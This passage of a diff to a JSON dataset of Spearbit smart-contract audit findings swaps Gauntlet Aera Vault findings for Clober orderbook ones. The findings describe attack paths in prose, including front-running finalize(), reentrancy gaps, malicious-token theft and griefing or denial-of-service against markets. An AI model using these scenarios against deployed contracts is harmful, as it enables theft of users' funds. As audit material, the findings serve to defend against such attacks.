{ setSwapEnabled(true); }", + "title": "Redundant flash loan balance cap", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The requested flash loan amounts are checked against and capped up to the contract's token balances, so the caller has to validate and handle the case where the tokens received are below the requested amounts. It would be better to optimize for the success case where there are sufficient tokens. Otherwise, let the function revert from failure to transfer the requested tokens instead.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Front-running attacks on finalize could affect received token amounts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The returnFunds() function (called by finalize()) withdraws the entire holdings in the Balancer pool but does not allow the caller to specify and enforce the minimum amount of received tokens. Without such a check the finalize() function could be susceptible to a front-running attack. A potential exploit scenario looks as follows: 1. The notice period has passed and the Treasury calls finalize() on the Aera vault. Assume the Balancer pool contains 1 WETH and 3000 DAI, and that WETH and DAI weights are both 0.5. 2. An attacker front-runs the Treasury's transaction and swaps in 3000 DAI to get 0.5 WETH from the pool. 3. As an unexpected result, the Treasury receives 0.5 WETH and 6000 DAI. Therefore an attacker can force the Treasury to accept the trade that they offer. Although the Treasury can execute a reverse trade on another market to recover the token amount and distribution, not every Treasury can execute such a trade (e.g., if a timelock controls it). Notice that the attacker may not profit from the swap because of slippage but they could be incentivized to perform such an attack if it causes considerable damage to the Treasury.", + "title": "Do direct assignment to totalBaseAmount and totalQuoteAmount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "While iterating through multiple claims, totalBaseAmount and totalQuoteAmount are reset and assigned a value each iteration. Since they are only incremented in the referenced block (and are mutually exclusive cases), the assignment can be direct instead of doing an increment.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "safeApprove in depositToken could revert for non-standard token like USDT", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Some non-standard tokens like USDT will revert when a contract or a user tries to approve an allowance when the spender allowance has already been set to a non-zero value. In the current code we have not seen any real problem with this fact because the amount retrieved via depositToken() is approved and sent to the Balancer pool via joinPool() and managePoolBalance(). Balancer transfers the same amount, lowering the approval to 0 again. However, if the approval is not lowered to exactly 0 (due to a rounding error or another unforeseen situation) then the next approval in depositToken() will fail (assuming a token like USDT is used), blocking all further deposits.
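One defensive pattern for this (a sketch only, using OpenZeppelin's SafeERC20; the bVault spender name is assumed) is to reset the allowance to zero before setting a new value:

// Sketch: tolerate tokens like USDT that revert on non-zero -> non-zero approvals.
uint256 current = token.allowance(address(this), address(bVault));
if (current != 0) {
    token.safeApprove(address(bVault), 0); // reset to zero first
}
token.safeApprove(address(bVault), amount);
// Alternatively: token.safeIncreaseAllowance(address(bVault), amount);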
Note: Set to medium risk because the probability of this happening is low but the impact would be high. We should also note that OpenZeppelin has officially deprecated the safeApprove function, suggesting the use of safeIncreaseAllowance and safeDecreaseAllowance instead.", + "title": "Redundant zero minusFee setter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "minusFee defaults to zero, so the explicit setting of it is redundant.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" - ] - }, - { - "title": "Consult with Balancer team about best approach to add and remove funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Aera Vault uses the AssetManager functionality of the managePoolBalance() function to add and remove funds. The standard way to add and remove funds in Balancer is via joinPool() / exitPool(). Using the managePoolBalance() function might lead to future unexpected behavior. Additionally, this disables the capacity to implement the original intention of the AssetManager functionality, e.g. storing funds elsewhere to generate yield.", - "labels": [ - "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Fee on transfer can block several functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Some tokens have a fee on transfer, for example USDT. Usually such a fee is not enabled but it could be re-enabled at any time. With this fee enabled the withdrawFromPool() function would receive slightly fewer tokens than the amounts requested from Balancer, causing the next safeTransfer() call to fail because there are not enough tokens inside the contract. This means withdraw() calls will fail. Functions deposit() and calculateAndDistributeManagerFees() can also fail because they have similar code. Note: The function returnFunds() is more robust and can handle this problem. Note: The problem can be alleviated by sending additional tokens directly to the Aera Vault contract to compensate for fees, lowering the severity of the problem to medium. function withdraw(uint256[] calldata amounts) ... { ... withdrawFromPool(amounts); // could get slightly less than amount with a fee on transfer ... for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { tokens[i].safeTransfer(owner(), amounts[i]); // could revert if the full amounts[i] isn't available ... } ... } }", + "title": "Load _FEE_PRECISION into local variable before usage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Loading _FEE_PRECISION into a local variable slightly reduced bytecode size (0.017kB) and was found to be a tad more gas efficient.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "enableTradingWithWeights allows the Treasury to change the pool's weights even if the swap is not disabled", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "enableTradingWithWeights is a function that can only be called by the owner of the Aera Vault contract and that should be used only to re-enable the swap feature on the pool while updating token weights.
The function does not verify whether the pool's swap feature is already enabled and, as a result, it allows the Treasury to act as the manager, who is the only actor allowed to change the pool weights. The function should add a check to ensure that it is only callable when the pool's swap feature is disabled.", + "title": "Can cache value difference in SegmentedSegmentTree464.update", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The replaced - value expression in SegmentedSegmentTree464.pop is recomputed several times in each loop iteration.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "AeraVault constructor is not checking all the input parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Aera Vault constructor handles Balancer's ManagedPool deployment. The constructor should perform more user input validation, and the Gauntlet team should be aware of the possible edge cases that could happen given that the deployment of the Aera Vault is handled directly by the Treasury and not by the Gauntlet team itself. We are going to list all the worst-case scenarios that could happen given the premise that the deployments are handled by the Treasury. 1. factory could be a wrapper contract that will deploy a ManagedPool. This would mean that the deployer could pass correct parameters to the Aera Vault to pass these checks, but will use custom and malicious parameters on the factory wrapper to deploy the real Balancer pool. 2. The swapFeePercentage value is not checked. On Balancer, the deployment will revert if the value is not inside the range >= 1e12 (0.0001%) and <= 1e17 (10% - this fits in 64 bits). Without any check, Gauntlet implicitly accepts following Balancer's swap requirements. 3. manager_ is not checked. They could set the manager as the Treasury (owner of the vault) itself. This would give the Treasury the full power to manage the Vault. At least these values should be checked: address(0), address(this) or owner(). The same checks should also be done in the setManager() function. 4. validator_ could be set to a custom contract that will give full allowances to the Treasury. This would make withdraw() act like finalize(), allowing all the funds to be withdrawn from the vault/pool. 5. noticePeriod_ has only a max value check. The Gauntlet team explained that a time delay between the initialization of the finalize process and the actual finalize is needed to prevent the Treasury from being able to instantly withdraw all the funds. Not having a min value check allows the Treasury to set the value to 0, so there would be no delay between initiateFinalization() and finalize() because noticeTimeoutAt == block.timestamp. 6. managementFee_ has no minimum value check. This would allow the Treasury to not pay the manager because the managerFeeIndex would always be 0. 7. description_ can be empty. From the Specification PDF, the description of the vault has the role to describe the vault purpose and modelling assumptions for differentiating between vaults. Being empty could lead to a bad UX for external services that need to differentiate different vaults. These are all the checks that are done directly by Balancer during deployment via the Pool Factory: BasePool constructor#L94-L95: min and max number of tokens.
BasePool constructor#L102: token array is sorted following the Balancer specification (sorted by token address). BasePool constructor calling _setSwapFeePercentage: min and max value for swapFeePercentage. BasePool constructor calling vault.registerTokens: token address uniqueness (can't have the same token in the pool). Following the path that call should take (vault.registerTokens -> MinimalSwapInfoPoolsBalance), BasePool also checks, from function _registerMinimalSwapInfoPoolTokens, that token != IERC20(0). ManagedPool constructor calling _startGradualWeightChange: checks the min value of each weight and that the total sum of the weights is equal to 100%. _startGradualWeightChange internally checks that endWeight >= WeightedMath._MIN_WEIGHT and normalizedSum == FixedPoint.ONE.", + "title": "Unnecessary loop condition in pop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The loop variable l in SegmentedSegmentTree464.pop is an unsigned int, so the loop condition l >= 0 is always true. The reason why it still terminates is that the first layer only has group index 0 and 1, so the rightIndex.group - leftIndex.group < 4 condition is always true when the first layer is reached, and then it terminates with the break keyword.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Possible mismatch between Validator.count and AeraVault assets count", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "A weak connection between WithdrawalValidator and the Aera Vault could lead to the inability to withdraw from a Vault. Consider the following scenario: The Validator is deployed with a tokenCount smaller than Vault.getTokens().length. Inside the withdraw() function we reference the following code block: uint256[] memory allowances = validator.allowance(); uint256[] memory weights = getNormalizedWeights(); uint256[] memory newWeights = new uint256[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable( address(tokens[i]), amounts[i], holdings[i].min(allowances[i]) ); } } A scenario where allowances.length < tokens.length would cause this function to revert with an Index out of bounds error. The only way for the Treasury to withdraw funds would be via the finalize() method which has a time delay.", + "title": "Use same comparisons for children in heap", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The pop function compares one child with a strict inequality (<) and the other with less than or equals (<=). A heap doesn't guarantee order between the children and there are no duplicate nodes (wordIndexes).", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Ensure vault deployment integrity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Treasury could, on purpose or by accident, deploy a slightly different version of the contract and introduce bugs or backdoors. This might not be recognized by parties taking on Manager responsibilities (e.g.
usually Gauntlet will be involved here).", + "title": "No need for explicit assignment with default values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Explicitly assigning the ZERO value (or any default value) costs gas, but is not needed.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Frequent calling of calculateAndDistributeManagerFees() lowers fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Via calculateAndDistributeManagerFees() a percentage of the Pool is subtracted and sent to the Manager. If this function is called too frequently his fees will be lower. For example: If he calls it twice, while both times getting 1%, he actually gets: 1% + 1% * (100% - 1%) = 1.99%. If he waits longer until he has earned 2%, he actually gets 2%, which is slightly more than 1.99%. If called very frequently the fees go to 0 (especially taking into account the rounding down). However the gas cost would be very high. The Manager can (accidentally) do this by calling claimManagerFees(). The Owner can (accidentally or on purpose (e.g. using a 0 balance change)) do this by calling deposit(), withdraw() or setManager(). Note: Rounding errors make this slightly worse. Also see the following issue: Possible rounding down of fees. function claimManagerFees() ... { calculateAndDistributeManagerFees(); // get a percentage of the Pool }", + "title": "Prefix increment is more efficient than postfix increment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The prefix increment reduces bytecode size by a little, and is slightly more gas efficient.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "OpenZeppelin best practices", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Aera Vault uses OpenZeppelin release 4.3.2 which is copied into their GitHub. The current release of OpenZeppelin is 4.6.0 and includes several updates and security fixes. The copies of the OpenZeppelin files are also (manually) changed to adapt the import paths. This has the risk of a mistake being made in the process. import \"./dependencies/openzeppelin/SafeERC20.sol\"; import \"./dependencies/openzeppelin/IERC20.sol\"; import \"./dependencies/openzeppelin/IERC165.sol\"; import \"./dependencies/openzeppelin/Ownable.sol\"; import \"./dependencies/openzeppelin/ReentrancyGuard.sol\"; import \"./dependencies/openzeppelin/Math.sol\"; import \"./dependencies/openzeppelin/SafeCast.sol\"; import \"./dependencies/openzeppelin/ERC165Checker.sol\";", + "title": "Tree update can be avoided for fully filled orders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "For fully filled orders, remainingAmount will be 0 (openOrderAmount == claimedRawAmount), so the tree update can be skipped since the new value is the same as the old value.
Hence, the code block can be moved inside the if (remainingAmount > 0) code block.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Possible rounding down of fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "If a certain token has few decimals then fees could be rounded down to 0, especially if the time between calls to calculateAndDistributeManagerFees() is relatively small. This could also slightly shift the spot price because the balance of one coin is lowered while the other remains the same. With fewer decimals the situation worsens, e.g. Gemini USD GUSD has 2 decimals, therefore the problem occurs with a balance of 10_000 GUSD. Note: The rounding down is probably negligible in most cases. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < tokens.length; i++) { amounts[i] = (holdings[i] * managerFeeIndex) / ONE; // could be rounded down to 0 } ... } With 1 USDC in the vault and 2 hours between calculateAndDistributeManagerFees(), the fee for USDC is rounded down to 0. This behavior is demonstrated in the following POC: import \"hardhat/console.sol\"; contract testcontract { uint256 constant ONE = 10**18; uint managementFee = 10**8; constructor() { // MAX_MANAGEMENT_FEE = 10**9; // 1 USDC uint holdings = 1E6; uint delay = 2 hours; uint managerFeeIndex = delay * managementFee; uint amounts = (holdings * managerFeeIndex) / ONE; console.log(\"Fee\",amounts); // fee is 0 } }", + "title": "Shift msg.value cap check for earlier revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The cap check on msg.value should be shifted up to the top of the function so that failed checks will revert earlier, saving gas in these cases.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Missing nonReentrant modifier on initiateFinalization(), setManager() and claimManagerFees() functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The initiateFinalization() function is missing a nonReentrant modifier while calculateAndDistributeManagerFees() executes external calls. Same goes for the setManager() and claimManagerFees() functions.", + "title": "Solmate's ReentrancyGuard is more efficient than OpenZeppelin's", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Solmate's ReentrancyGuard provides the same functionality as OpenZeppelin's version, but is more efficient as it reduces the bytecode size by 0.11kB, which can be further reduced if its require statement is modified to revert with a custom error.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Potential division by 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "If the balance (e.g. holdings[]) of a token is 0 in deposit() then dividing by holdings[] would cause a revert. Note: Function withdraw() has similar code but when holdings[]==0 it's not possible to withdraw() anyway. Note: The current Mannon vault code will not allow the balances to be 0.
Note: Although not used in the current code, in order to do a deregisterTokens(), Balancer requires the balance to be 0. Additionally, refer to the following Balancer documentation about the-vault#deregistertokens. The worst-case scenario is deposit() not working. function deposit(uint256[] calldata amounts) ... { ... for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { depositToken(tokens[i], amounts[i]); uint256 newBalance = holdings[i] + amounts[i]; newWeights[i] = (weights[i] * newBalance) / holdings[i]; // would revert if holdings[i] == 0 } ... ... } Similar divisions by 0 could occur in getWeightChangeRatio(). The function is called from updateWeightsGradually(). If this is due to targetWeight being 0, then it is the desired result. The current weight should not be 0 due to Balancer checks. function getWeightChangeRatio(uint256 weight, uint256 targetWeight) ... { return weight > targetWeight ? (ONE * weight) / targetWeight : (ONE * targetWeight) / weight; // could revert if targetWeight == 0 // could revert if weight == 0 }", + "title": "r * r is more gas efficient than r ** 2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "It's more gas efficient to do r * r instead of r ** 2, saving on deployment cost.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Use ManagedPoolFactory instead of BaseManagedPoolFactory to deploy the Balancer pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Currently the Aera Vault is using BaseManagedPoolFactory as the factory to deploy the Balancer pool while Balancer's documentation recommends and encourages the usage of ManagedPoolFactory. Quoting the doc inside the BaseManagedPoolFactory: This is a base factory designed to be called from other factories to deploy a ManagedPool with a particular controller/owner. It should NOT be used directly to deploy ManagedPools without controllers. ManagedPools controlled by EOAs would be very dangerous for LPs. There are no restrictions on what the managers can do, so a malicious manager could easily manipulate prices and drain the pool. In this design, other controller-specific factories will deploy a pool controller, then call this factory to deploy the pool, passing in the controller as the owner.", + "title": "Update childHeapIndex and shifter initial values to constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The initial values of childHeapIndex and shifter can be hardcoded to avoid redundant operations.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Adopt the two-step ownership transfer pattern", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "To prevent the Aera vault Owner, i.e. the Treasury, from calling renounceOwnership() and effectively breaking vault critical functions such as withdraw() and finalize(), the renounceOwnership() function is explicitly overridden to revert the transaction every time.
However, the transferOwnership() function may also lead to the same issue if the ownership is transferred to an uncontrollable address because of human errors or attacks on the Treasury.", + "title": "Same value tree update falls under else case which will do redundant overflow check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "In the case where value and replaced are equal, it currently will fall under the else case which has an addition overflow check that isn't required in this scenario. In fact, the tree does not need to be updated at all.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Implement zero-address check for manager_", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "There is no zero-address check inside the constructor for the manager_ parameter. If manager_ becomes a zero address then calls to calculateAndDistributeManagerFees will burn tokens (transfer them to address(0)).", + "title": "Unchecked code blocks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The mentioned code blocks can be performed without native math overflow / underflow checks, because the values have already been checked or the min / max range ensures safety.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Simplify tracking of managerFeeIndex", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The calculateAndDistributeManagerFees() function uses updateManagerFeeIndex() to keep track of management fees. It keeps track of both managerFeeIndex and lastFeeCheckpoint in storage variables (costing SLOAD/SSTORE). However, because managementFee is immutable this can be simplified to one storage variable, saving gas and improving code legibility. uint256 public immutable managementFee; // can't be changed function calculateAndDistributeManagerFees() internal { updateManagerFeeIndex(); ... if (managerFeeIndex == 0) { return; } ... // use managerFeeIndex ... managerFeeIndex = 0; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; lastFeeCheckpoint = block.timestamp.toUint64(); }", + "title": "Unused Custom Error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "error TreeQueryIndexOrder(); is defined but unused.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Gas Optimization" ] }, { - "title": "Directly call getTokensData() from returnFunds()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The function returnFunds() calls getHoldings() and getTokens(). Both functions call getTokensData(), thus wasting gas unnecessarily. function returnFunds() internal returns (uint256[] memory amounts) { uint256[] memory holdings = getHoldings(); IERC20[] memory tokens = getTokens(); ...
} function getHoldings() public view override returns (uint256[] memory amounts) { (, amounts, ) = getTokensData(); } function getTokens() public view override returns (IERC20[] memory tokens) { (tokens, , ) = getTokensData(); }", + "title": "Markets with malicious tokens should not be interacted with", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The Clober protocol is permissionless and allows anyone to create an orderbook for any base token. These base tokens can be malicious and interacting with these markets can lead to loss of funds in several ways. For example, a token with custom code / a callback to an arbitrary address on transfer can use the pending ETH that the victim supplied to the router and trade it for another coin. The victim will lose their ETH and then be charged a second time using their WETH approval of the router.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Change uint32 and uint64 to uint256", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The contract contains a few variables/constants that are smaller than uint256: noticePeriod, noticeTimeoutAt and lastFeeCheckpoint. This doesn't actually save gas because they are not part of a struct and still take up a storage slot. It even costs more gas because additional bits have to be stripped off. Additionally, there is a very small risk of lastFeeCheckpoint wrapping to 0 in the updateManagerFeeIndex() function. If that were to happen, managerFeeIndex would get far too large and too many fees would be paid out. Finally, using uint256 simplifies the code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { ... uint32 public immutable noticePeriod; ... uint64 public noticeTimeoutAt; ... uint64 public lastFeeCheckpoint = type(uint64).max; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; // could get large when lastFeeCheckpoint wraps lastFeeCheckpoint = block.timestamp.toUint64(); }", + "title": "Claim bounty of stale orders should be given to user instead of daoTreasury", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "When an unclaimed stale order is being replaced, the claimBounty is sent to the DAO treasury.
However, since the user is the one executing the claim on behalf of the stale order owner, and is paying the gas for it, the claimBounty should be sent to him instead.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Use block.timestamp directly instead of assigning it to a temporary variable.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "It is preferable to use block.timestamp directly in your code instead of assigning it to a temporary variable as it only uses 2 gas.", + "title": "Misleading comment on remainingRequestedRawAmount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The comment says // always ceil, but remainingRequestedRawAmount is rounded down when the base / quote amounts are converted to the raw amount.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Consider replacing pool.getPoolId() with bytes32 public immutable poolId to save gas and external calls", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current implementation of the Aera Vault always calls pool.getPoolId(), directly or indirectly via getPoolId(), to retrieve the ID of the immutable state variable pool that has been declared at constructor time. The pool.getPoolId() is a getter function defined in the Balancer BasePool contract: function getPoolId() public view override returns (bytes32) { return _poolId; } Inside the same BasePool contract the _poolId is defined as immutable, which means that after creating a pool it will never change. For this reason it is possible to apply the same logic inside the Aera Vault and use an immutable variable to avoid external calls and save gas.", + "title": "Potential DoS if quoteUnit and index to price functions are set to unreasonable values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "There are some griefing and DoS (denial-of-service) attacks for some markets that are created with bad quoteUnit and pricing functions. 1. A market order uses _take to iterate over several price indices until the order is filled. An attacker can add a tiny amount of depth to many indices (prices), increasing the gas cost and in the worst case leading to out-of-gas transactions. 2. There can only be MAX_ORDER_SIZE (32768) different orders at a single price (index). Old orders are only replaced if the previous order at the index has been fully filled. A griefer or a market maker trying to block their competition can fill the entire order queue for a price. This requires 32768 * quoteUnit quote tokens.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Save values in temporary variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "We observed multiple occurrences in the codebase where .length was used in for loops. This could lead to more gas consumption as .length gets called repetitively until the for loop finishes. When indexed variables are used multiple times inside the loop in a read-only way, these can be stored in a temporary variable to save some gas.
for (uint256 i = 0; i < tokens.length; i++) { // tokens.length has to be calculated repeatedly ... ... = tokens[i].balanceOf(...); tokens[i].safeTransfer(owner(), ...); } // tokens[i] has to be evaluated multiple times", + "title": "Rounding rationale could be better clarified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The rationale for rounding up / down would be easier to follow if tied to the expendInput option instead.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Aera could be prone to out-of-gas transaction revert when managing a high number of tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Balancer ManagedPool used by Aera has a max limit of 50 tokens. Functions like initialDeposit(), deposit(), withdraw() and finalize() involve numerous external direct and indirect (made by Balancer itself when called by Aera) calls and math calculations that are done for each token managed by the pool. The functions deposit() and withdraw() are especially gas intensive, given that they also internally call calculateAndDistributeManagerFees() which will transfer, for each token, a management fee to the manager. For these reasons Aera should be aware that a high number of tokens managed by the Aera Vault could lead to out-of-gas reverts (the max block gas limit depends on which chain the project will be deployed to).", + "title": "Rename flashLoan() for better composability & ease of integration", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "For ease of 3rd party integration, consider renaming to flash(), as it would then have the same function sig as Uniswap V3, although the callback function would still be different.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Use a consistent way to call getNormalizedWeights()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The functions deposit() and withdraw() call the function getNormalizedWeights() while the functions updateWeightsGradually() and cancelWeightUpdates() call pool.getNormalizedWeights(). Although this is functionally the same, it is not consistent. function deposit(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Deposit(amounts, getNormalizedWeights()); } function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Withdraw(amounts, allowances, getNormalizedWeights()); } function updateWeightsGradually(...) ... { ... uint256[] memory weights = pool.getNormalizedWeights(); ... } function cancelWeightUpdates() ... { ... uint256[] memory weights = pool.getNormalizedWeights(); ... } function getNormalizedWeights() ... { return pool.getNormalizedWeights(); }", + "title": "Unsupported tokens: tokens with more than 18 decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The orderbook does not currently support tokens with more than 18 decimals.
However, having more than 18 decimals is very unusual.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Add function disableTrading() to IManagerAPI.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The disableTrading() function can also be called by managers because of the onlyOwnerOrManager modifier. However, in AeraVaultV1.sol it is located in the PROTOCOL API section. It is also not present in IManagerAPI.sol. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { /// PROTOCOL API /// function disableTrading() ... onlyOwnerOrManager ... { ... } /// MANAGER API /// } interface IManagerAPI { function updateWeightsGradually(...) external; function cancelWeightUpdates() external; function setSwapFee(uint256 newSwapFee) external; function claimManagerFees() external; } // disableTrading() isn't present", + "title": "ArithmeticPriceBook and GeometricPriceBook contracts should be abstract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The ArithmeticPriceBook and GeometricPriceBook contracts don't have any external functions.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Doublecheck layout functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Different ways are used to lay out functions. Especially the part between ( ... ) and between ) ... { is sometimes done on one line and sometimes split over multiple lines. Also { is sometimes at 